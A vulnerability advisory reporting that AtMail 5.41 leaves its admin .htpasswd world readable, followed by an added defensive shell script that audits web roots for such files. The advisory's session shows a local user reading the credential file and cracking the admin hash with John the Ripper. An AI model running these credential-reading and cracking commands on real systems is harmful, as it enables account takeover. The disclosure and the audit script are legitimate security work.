AtMail 5.41 - world readable admin .htpasswd


AtMail 5.41 stores the admin user's username and password hash in a file at atmail/webadmin/.htpasswd, which is world readable post-install.


Any local user can view this file and learn the username of the admin user, and attempt to crack the admin password hash.

[user@host ~]$ ls -l /usr/local/apache/htdocs/atmail/webadmin/.htpasswd
-rw-r--r-- 1 nobody nobody 36 May 23 10:04 /usr/local/apache/htdocs/atmail/webadmin/.htpasswd
[user@host ~]$ cat /usr/local/apache/htdocs/atmail/webadmin/.htpasswd
[user@host ~/john/run]$ ./john /usr/local/apache/htdocs/atmail/webadmin/.htpasswd
Loaded 1 password hash (Apache MD5 [32/32])
password         (admin)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 4001  trying: password
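The following audit script is an added example and not part of the original advisory: it walks a web root for .htpasswd files that other users can read and tightens them to owner-only access, which the web server user (the file's owner, "nobody" above) can still read. The directory tree it checks is constructed in a temp dir for the demo; the hash in it is a placeholder, not a real credential.

```shell
#!/bin/sh
# Added example (not part of the AtMail advisory): find .htpasswd files
# whose mode grants read access to "other", report them, and fix them.

# List every .htpasswd under $1 that any local user can read.
# -perm -o=r matches when the "others read" bit is set.
find_world_readable_htpasswd() {
    find "$1" -type f -name .htpasswd -perm -o=r 2>/dev/null
}

# Return 0 when no exposed file exists under $1, 1 otherwise.
htpasswd_audit() {
    bad=$(find_world_readable_htpasswd "$1")
    if [ -n "$bad" ]; then
        printf 'world-readable: %s\n' $bad
        return 1
    fi
    return 0
}

# Remediation: owner read/write only. The web server user owns the
# file, so it keeps working; unrelated local users lose access.
harden_htpasswd() {
    chmod 600 "$1"
}

# Constructed demo tree mirroring the advisory's layout (not a real install).
demo_root=$(mktemp -d)
mkdir -p "$demo_root/atmail/webadmin"
demo_file="$demo_root/atmail/webadmin/.htpasswd"
printf 'admin:$apr1$PLACEHOLDER$notarealhash\n' > "$demo_file"
chmod 644 "$demo_file"   # the post-install mode reported in the advisory

if htpasswd_audit "$demo_root"; then
    echo "no exposed .htpasswd files"
else
    echo "exposed .htpasswd found; tighten with chmod 600"
fi
```

Run it against the real document root (e.g. /usr/local/apache/htdocs) instead of the demo tree to check an installed copy.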